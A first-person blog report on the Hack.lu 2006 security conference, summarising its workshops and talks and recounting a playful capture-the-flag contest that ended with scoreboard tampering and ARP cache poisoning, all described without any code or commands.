Thursday, october 19th - Day 1

Big day with three rooms for workshops and Internet infrastructure security track. As I had to prepare and eventualy present a WiFi workshop with Philippe Teuwen, I couldn't attend other presentations. Too bad...

Among six planed workshops, two have been canceled, Raoul Chiesa being sick and the other guy... Well... I don't know...

  • Using Computer Forensics at the police, by Federal Computer Crime Unit of Belgium
  • Writing Metasploit plugins, from vulnerability to exploit, by Saumil Shah. He set a full architecture up for his workshop so people could try to practice what they were seeing with their own laptop. I've heard somebody interfered a lot with thoses demos so others couldn't play...
  • ""802.11 Security, inaccessible star ?"", by Philippe Teuwen & Cédric "Sid" Blancher (i.e. me). Philippe, being strongly involved with Wi-Fi Alliance has been presenting everything around WEP, WPA, 802.11i and WPA2. He was expected to deliver some hot news about upcoming Wireless Protected Setup but couldn't du to total blackout until november 6. I presented risks associated to Wi-Fi open networks, very similar to what I gave at BCS but more detailed.
  • Tactical VoIP: VoIPhreaking, by The Grugq. It was the same talk he's been delivering for quite some time now[1] on VoIP phreaking. After a funny introduction faking a dumb XSS talk, we had a pretty complete overview of VoIP lack of security.
  • Raoul Chiesa, A new approach to Cybercrime: the Hacker's Profiling Project (HPP) Canceled
  • PHP Security Canceled

A track dedicated to Internet infrastructure security was running at the same time with various speakers:

Everything running in parallel, some were a bit disappointed to be forced to choose between presentations they'd been interested in. On the other side, there were only three days, not a full week.

Friday, october 20th - Day 2

First day for the conference itself.

  • Opening by Renaud Deraison (Tenable Network Security) with a "keynote" on security and vulnerability landscape: more and more noise, less and less serious remote flaws, hardened OSes, editor prefering DoS to remote access, in depth security... Renaud had a lot of things to say, it's very difficult to summarize his talk in few lines, so have a look at his slides.
  • Towards an Invisible Honeypot Monitoring System, Nguyen Anh Quynh (Keio university, JP). Just as at Eusecwest/core06, Quynh presented Xebek, a new Sebek-like system based on Xen.
  • An empirical analysis of malware, Oliver Schmid. Pretty complete and didactic malware analysis technics and tools state of the art.
  • Sensible defence, Koen Maris. Risk management and its pitfalls. Don't forget human factor, or the "chair-interface issue''. Nothing new, but still interesting.
  • Lightning talks first session...
    • Hack.lu 2005 Crypto Challenge, Claus Overbeck. How to break last year challenge.
    • Hacking NEDAP Voting-Computers, Andreas Bogk & Hannes Mehnert. How to change a voting machine into a chess game, how to identify voters, discover who they're voting for, etc. A technical and factual pleading against black box voting. Enlighting.
  • Bluetooth Hacking revisited, Thierry Zoller & Kevin Finistere. Kevin being unavailable, Thierry made a nice presentation of known Bluetooth flaws and some of their own discoveries, particularly a remote flaw in MacOS OBEX file server on which they've based a worm called InqTana and a PIN cracking implementation using a hardware Bluetooth sniffer. Some demos, some very interesting info and maybe too much blabla around their flaw.
  • Triple Play, Triple threats ? - IPTV Security, Yen-Ming Chen (Foundstone). Great disappointment on this one. I was waiting for real stuff, but we barely had only Visio maps. Hoping better for Pacsec/core06...
  • IPv6 Security and insecurity, Van Hauser, (THC). Roughly the same talk as in Cansecwest/core06 and other places, with minor updates. Interested for people discovering IPv6 and its security.
  • Smashing Heap by Free Simulation, Sandip Chaudhari. This guy showed an interesting approach for exploiting heap overflows, simulating a free chunk at some place he controls in memory, such as stack. Thus he could exploit pretty easily heap overflows on AIX and Solaris.
  • DNS Security, Daniel Karrenberg. I hate to say that[3] about someone obviously mastering the subject, but this talk was pretty boring. Open DNS servers are bad, beware of cache poisoning, DNS spoofing, and use DNSSEC. I may have missed something great, but it looked like a five years travel back in time...

Organizers had first canceled CTF challenge, but HackerJoe proposed one at the last minute, allowing 6 teams to compete over 7 levels. Two of them went particularly far this day : german guys from RedTeam and frenchies from Bisounours team[4], this last one being one level ahead at the end of the day.

Then came the awaited speakers diner at La Coque restaurant. Great moment, but somehow, our Bisounours friends were still deep into the challenge...

Saturday, october 21st - Day 3

Last day for Hack.lu, not much sleep...

  • Software Engineering Security by Wietse Venema, well known TCP wrappers, SATAN and Postfix author. I was expecting something very similar to what I presented at SecureCon, but he focused on secure file deletion, demonstrating how little hidden details can make you completely wrong. Better use encrypted file systems...
  • Security in Grid Computing, Lisa Thalheim. Her talk was not that technical, but it was a very good overview of security issues you can encounter in a grid computing environment, from the grid itself to applications development and priviledges handling.
  • Secure networking, Hannes Mehnert & Andreas Bogk. They presented an IP stack developped with Dylan programming language with security in mind. They claim it to be flawless. Interesting approach, good points. Very good talk, theses guys definitly have a clue there.
  • WiFi Advanced Stealth, Laurent Butti & Franck Veysset. They presented and demonstrated their work on stealth WiFi communications, using altered management or control frames to establish wireless cover channels. They also had a word on WiFi stacks fuzzing. Great talk.
  • Lightning talks second session...
    • Mobile Voice Encryption, Frederico Moro. An initiative to push an open encryption standard.
    • HPP - The Hacker Profiling Project, Raoul Chiesa. Being sick on thursday, he had to cancel his workshop. So he decided to present the project as a lightning talk. Anonymous forms are used for hackers to define themselves. If one can question this approach, they have interesting results. They still have to promote this initiative, as most of the crowd never heard of it...
    • Fire in the Skype, the Bisounours edition, Cédric 'Sid' Blancher. I've been requested to present this lightning talk from Recon 2006 to illustrate overlay networks risks. So I did.
    • Fast Software Encryption 2007 presentation. This event is dedicated to symetric ciphers. Not interested ? Just have a look at program committee...
  • Exploiting hidden services to setup anonymous communication infrastructure, Fabio Pietrosanti who presented anonymous infrastructures basic concepts, implementation and their increasing usage on Internet, as well as some good ideas to enhance them, especially regarding providing anonymous services. He focused on Laissez Faire Island as a way to provide them. He mentionned this live video feed through Tor at Toorcon as a way to hide speakers location. I was quite puzzled... Thoses guys don't have credit card, driving licence ? They don't receive mail, don't pay taxes ? I mean there's so many ways to locate somehow that I don't really see the point of this, outside demonstrating one's ability to use Tor...
  • Broadcasting by Misuse of Satellite ISPs, Andre Adelsbach. Strange. Satellites are a pretty hot topic theses days, but I wasn't impress at all by this talk. Basicly, an insider can broadcast traffic by breaking encryption scheme he partially knows. Interesting though for ones who are not familiar with satellite broadcasting systems.
  • How to find anything underneath the commercial web: Powersearching without google, Fravia. Outside the fact he uses Google a lot, this talk explains how to search for very specific things avoiding commercials and pointless stuff. Worth reading, except if you already had a look at his previous presentations, like the one at Recon 2006.
  • Red Team and Bisounours then presented their achievements at Hack.lu 2006 CTF they both completed... And more...
  • Web Hackers vs Search Engines and more, Laurent Oudot. Rstack founder presented nice findings on search engines algorithms and ways to artificially increase your rank for arbitrary requests. As an example, if you look for "Laurent Oudot" in Yahoo!, first link will be Slashdot, although they haven't mentionned him for years[5]. He showed some similar tricks on Google and MSN, even a Yahoo! based port scanner, and conclude on some interesting leads for future work.
  • Closing speech.

Bisounours

About CTF challenge... Bisounours team validated last level early in the morning, around 6am, winning the game. They managed to break into the scoreboard database so they could modify their entry, showing a validation at 03:13:37. Barely nobody noticed this joke. Then RedTeam finished around 1pm. In fact, while Bisounours were at speaker diner, RedTeam stayed at the hotel where conference wireless access was down, so they were not able to download FreeBSD images they needed to validate Level 3. At the same time, fluffy bears were enjoying free high speed WiFi connection at diner's location to download everything they wanted. Who said it was cheating ? From here, both team tried to takeover CTF host. While RedTeam was getting root access, Bisounours were cracking their password so they could take advantage from other team shell. They did :) We could see many modifications in scoreboard, with a brand new "Level 8", then a "Final Stage (not for girls)" quickly followed by "Teh Purp1e Styl3sh33t and Fri3z". As it got more and more difficult to log on the host, as shells were killed and binaries deleted, I was hired to set up a global network redirection to a controled mirror web server using ARP cache poisoning so we could feed our own scoreboard. It work for a moment, and CTF was definitly closed as it was beginning to monopolize most of wireless network bandwidth. At least I could proove arp-sk to be a very powerful and versatil tool, achieving a mass poisoning arpspoof couldn't do easily and demonstrate some stuff I had presented two days before ;) Maybe next time, I'll have a Wifitap based HTTP traffic poisonner...

My conclusion: very good conference.

If you need another point of vue, you should try other reports[6]:

You can also find my pictures online.

Notes

[1] Noticed the HiTB in filename ?

[2] French RENATER equivalent for Switzerland.

[3] Yes, yes, I do !

[4] Fluffy bears...

[5] They might be soon...

[6] If you have wrote a report too, just drop a trackback (see URL below) or email me, I will add it to this list. Thx.